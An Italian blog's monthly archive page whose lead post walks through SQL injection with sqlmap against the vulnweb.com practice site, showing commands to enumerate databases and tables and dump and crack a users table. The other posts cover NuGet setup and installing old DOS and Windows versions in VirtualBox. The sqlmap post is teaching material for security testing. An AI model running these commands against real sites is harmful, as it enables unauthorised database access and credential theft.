Archive for settembre 2021

attacco a database con Sqlmap

Posted on 27 settembre 2021. Filed under: Senza categoria |

In questo articolo vedremo SqlMap.

Premetto che non è mia intenzione spiegare come attaccare sistemi altrui e ricordo che violare un sistema informatico non autorizzato è vietato dalla legge. Lo scopo dell’articolo è per spiegare come scoprire buchi nei vostri sistemi e quindi mettergli la “pezza”.

Sqlmap è un software open source per il penetration testing, che permette di automatizzare il rilevamento e lo sfruttamento di difetti nelle SQL injection e prendere così il controllo dei server DBMS. Il software lavora a linea di comando.
Sqlmap supporta svariati DBMS come MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB e Informix. Supporta inoltre 6 diversi tipi di SQL injection.

Può riconoscere anche il formato hash delle password e lanciare su di esse degli attacchi a dizionario.

Sqlmap integra al suo interno altri strumenti per il Penetration Testing come Metasploit e w3af.

In questo articolo useremo Sqlmap su una macchina Kali Linux.

Come macchina della vittima useremo un sito di test appositamente creato per i test e per fare pratica di Penetration Testing.

Il sito è vulnweb.com.

Vediamo quindi come fare un Injection Sql a un database.

Apriamo una finestra terminale, e digitiamo il seguente comando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1”. Dobbiamo mettere l’input in fase della query GET, ossia nella barra degli indirizzi.

Vedremo un output simile a questo:

image

 

Questo ci indica che il sito è vulnerabile.

Vediamo anche che il DBMS usato è MySql.

Abbiamo la conferma digitando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-dbms MySQL

 image

Vediamo allora se siamo dba con il comando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –is-dba

image

 

Non siamo dba ma andiamo avanti a scoprire su quale database ci connettiamo:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –current-db

image

 

Andiamo a vedere correnti username e password di connessione al database:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –current-user

 

image

 

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-passwords

Che però non ce la fa vedere perchè non siamo dba.

image

 

Procediamo comunque a vedere le tabelle e magari le righe.

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-tables

 

image

 

Per avere le righe di qualunque tabella basta usare

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-tables nometabella

ad esempio:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-tables categ

image

Quella che ci interessa è però, ovviamente, la tabella users.

Usiamo quindi il comando:

sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –-dump users

Lui ci chiederà di craccare la password passandogli un file di dizionario o usando il suo dizionario:

image

 

Ma alla fine otteniamo quello che ci interessa:

image

 

A questo punto possiamo poi usare altri tools per modificare la password, cancellare l’utente, crearne uno nuovo e così via.

Ma quella è un’altra storia (e un altro articolo).

Leggi l'articolo intero | Make a Comment ( None so far )

Quando Nuget si perde i pacchetti…

Posted on 22 settembre 2021. Filed under: Senza categoria |

Al rientro dalle vacanze ho acquistato e installato sul PC un nuovo disco fisso.

Installato Windows e i vari software, tra i quali Visual Studio 2019.

Ho provato poi ad aprire qualche software che ho sviluppato e funziona.

Non avevo provato le Mobile Application.

Passa circa un mese e voglio fare dei test con delle Application per i dispositivi portatili.

Creo quindi una Xamain.Forms Application e già subito dopo la creazione mi appaiono questi errori.

image

 

image

 

Cercando di capire cosa manca ho risolto e scrivo qua la procedura.

1) Andare in Strumenti, Opzioni, Gestione Pacchetti Nuget, Origini pacchetti e vi troverete una finestra come questa:

image

 

Notate che “Origini pacchetti” è vuota. Dobbiamo aggiungere Nuget.

2) Cliccare sul simbolo + verde e in automatico diventerà così:

image

3) Andare in basso e su nome digitare: ”nuget.org”

4) In Origine digitare: “https://api.nuget.org/v3/index.json”

5) Cliccare sul pulsante Aggiorna

 

La schermata diventerà così:

image

 

6) Cliccare su OK

7) Compilare il progetto: CTRL + SHIFT + B

 

Problema risolto, andiamo a vedere l’elenco degli errori:

 

image

 

Anche in Esplora Soluzioni non segnala più l’errore.

image

Leggi l'articolo intero | Make a Comment ( None so far )

Rispolveriamo i vecchi giochi del DOS

Posted on 12 settembre 2021. Filed under: Senza categoria |

 

image

In questo articolo andremo a vedere come rispolverare i vecchi giochi a 16 bit e finire la serie per i nostalgici. Ci giocavo quando ero poco più che ventenne, era la scusa per far giocare i miei nipoti, ma ci giocavo e mi divertivo pure io.

Userò per questo la macchina virtuale Windows 3.1 in Virtualbox, installata con l’articolo https://pieer11.wordpress.com/2021/09/12/riesumiamo-windows-3-1/

Riapriamo quindi quella macchina virtuale.

Per procedere, dobbiamo trasformare i file contenuti nel dischetto in una immagine .ima o .img.

Per fare questo useremo Win Image. Vediamo prima quindi come funziona Win Image.

Win Image è un piccolo programma che serve proprio a creare file di immagine per floppy da usare nelle macchine virtuali.

Lo possiamo scaricare da www.winimage.com/download.htm

2021-09-11 (19)

Una volta scaricato, lo eseguiamo e lo installiamo.

2021-09-11 (20)

2021-09-11 (21)

2021-09-11 (22)

2021-09-11 (23)

2021-09-11 (24)

2021-09-11 (25)

2021-09-11 (26)

 

Apriamo quindi Win Image.

image

 

Clicchiamo sull’icona “Nuovo”

image

Clicchiamo poi su OK.

Clicchiamo ora su Inject e selezioniamo la cartella dove abbiamo copiato i file prelevati dal floppy fisico tramite un vecchio pc e trasferiti su un percorso di rete.

image

Prendo il gioco Tetris perché lo conosciamo un po’ tutti.

Quindi clicchiamo su Apri.

image

Ecco, ora siamo pronti a creare il file immagine.

Per fare questo clicchiamo su Sull’icona del dischetto.

image

Il formato deve essere ima.

Salviamo e ora siamo pronti a “mettere” il file nel lettore floppy virtuale di Virtualbox.

image

image

 

image

Facciamo OK.

A questo punto dobbiamo solo andare a trovare il dischetto e lanciare il file eseguibile.

Lo facciamo dal File Manager.

image

 

image

 

image

E così via per altri giochi o altro materiale che volete avere su un nuovo PC.

Leggi l'articolo intero | Make a Comment ( None so far )

Riesumiamo windows 3.1

Posted on 12 settembre 2021. Filed under: Senza categoria |

 

In questo articolo vediamo come installare Windows 3 su una macchina virtuale.

I file per i download non sono miei, li ho trovati sulla rete, in allegato all’articolo installare windows 3.1 su virtual box | Gabriele97’s Blog (wordpress.com), ma potremo sempre crearli con WinImage.

 

Iniziamo.

Io ho creato un clone della macchina virtuale MS-DOS del quale trovate l’articolo qua: https://pieer11.wordpress.com/2021/09/11/installazione-di-ms-dos-6-22-in-virtualbox/

 

Scarichiamo il primo file Immagine da http://download1649.mediafire.com/inpryomz8izg/1uyymjj0zjt/a.ima

e lo andiamo a inserire nelle impostazioni della macchina virtuale in corrispondenza del Floppy in Virtualbox.

 

image

 

Avviamo la macchina virtuale e andiamo su A:

Digitiamo quindi SETUP

image

Premiamo il tasto INVIO e proseguiamo.

image

Creiamo una installazione personalizzata per vedere meglio le varie opzioni.

image

 

Lasciamo il nome della cartella così com’è, ormai ci siamo abituati.

Nella successiva schermata cambiamo in base alla foto sotto:

 

image

Proseguiamo.

Ci chiede il disco 2.

image

Inseriamo il disco 2, andando nelle impostazioni del Floppy e selezionando il file scaricato da http://www.mediafire.com/?gwuxujnomdw

 

image

 

Ci chiede adesso il disco 3

image

 

Facciamo la stessa cosa per il disco 3, scaricandolo da http://www.mediafire.com/?zw0jwzummez

Infine partirà la parte grafica dell’installazione:

 

image

 

 

Mettiamo il nome e procediamo.

Nella successiva schermata

 

image

togliamo la spunta su tutto.

Nella successiva schermata lasciamo le impostazioni predefinite:

 

image

 

 

 

 

 

image

 

Il disco 4 lo scarichiamo da http://www.mediafire.com/?kmotz33zntu

image

Il disco 5 lo scarichiamo da http://www.mediafire.com/?yno34zjzmmx

 

L’installazione è finita, lasciamo ora fare a Windows le ultime impostazioni per noi, automaticamente.

 

image

 

image

 

Usciamo dal tutorial.

image

 

Riavviamo il pc.

image

 

Per lanciare Windows basta semplicemente digitare WIN e poi Invio.

Possiamo ora rivivere quei bei momenti.

image

Leggi l'articolo intero | Make a Comment ( None so far )

Come era il primo windows

Posted on 11 settembre 2021. Filed under: Senza categoria |

Nel mese di Luglio ho scritto un articolo sull’anteprima di Windows 11.

Ma com’era Windows 1.0, uscito nel 1985?

Eccolo dalla mia macchina virtuale in Virtualbox.

image

Proviamo a installarlo.

Prima di tutto dobbiamo scaricare la ISO. Io l’ho trovata in https://archive.org/details/win-1.0

Apriamo quindi Virtualbox, creiamo una macchina virtuale e seguite i passaggi come da miei screenshot.

image

image

 

image

 

image

 

image

 

image

Andiamo poi nelle impostazioni.

image

 

image

 

image

 

Possiamo ora avviare la macchina virtuale.

image

 

Continuerò in seguito a scrivere e pubblicare altri articoli su vecchi sistemi.

Leggi l'articolo intero | Make a Comment ( None so far )

Installazione di MS-DOS 6.22 in Virtualbox

Posted on 11 settembre 2021. Filed under: Senza categoria |

 

Oggi ho voluto rispolverare vecchi sistemi operativi, per nostalgia di quando avevo 30 anni in meno.

Il problema principale è recuperare i file, in quanto nelle Subscription di My Visual Studio c’è solo il file compresso ma non in formato avviabile.

Se avete ancora i vecchi Floppy Disk funzionanti e un lettore floppy disk, o un PC vecchio, dovete trasformare ogni singolo floppy in una immagine. Per fare questo potete usare un programma chiamato Win Image, scaricabile da https://www.winimage.com/download.htm

 

Oppure possiamo scaricare i 3 file img dal seguente link:

https://www.dropbox.com/sh/jzm0fbnb7fz526u/mKJ19A1JMo (Il link l’ho trovato tramite ricerca sulla rete).

 

Una volta che abbiamo i file dei floppy in formato immagine, possiamo procedere.

Creiamo una nuova macchina virtuale e impostate i vari settaggi come nelle successive schermate.

image_thumb

 

image_thumb[1]

image_thumb[2]

image_thumb[3]

image_thumb[4]

image_thumb[5]

image_thumb[6]

image_thumb[7]

Salviamo e avviamo la macchina virtuale,

image_thumb[10]

image_thumb[11]

image_thumb[12]

image_thumb[13]

image_thumb[14]

 

image_thumb[15]

image_thumb[16]

image_thumb[17]

image_thumb[18]

 

image_thumb[19]

L’installazione è finita.

Rimuoviamo i dischi virtuali e riabbiamo la macchina.

image_thumb[20]

 

Ecco che possiamo usare il DOS.

Vedremo in un successivo articolo come installare Windows 3.1.

Leggi l'articolo intero | Make a Comment ( None so far )

Liked it here?
Why not try sites on the blogroll...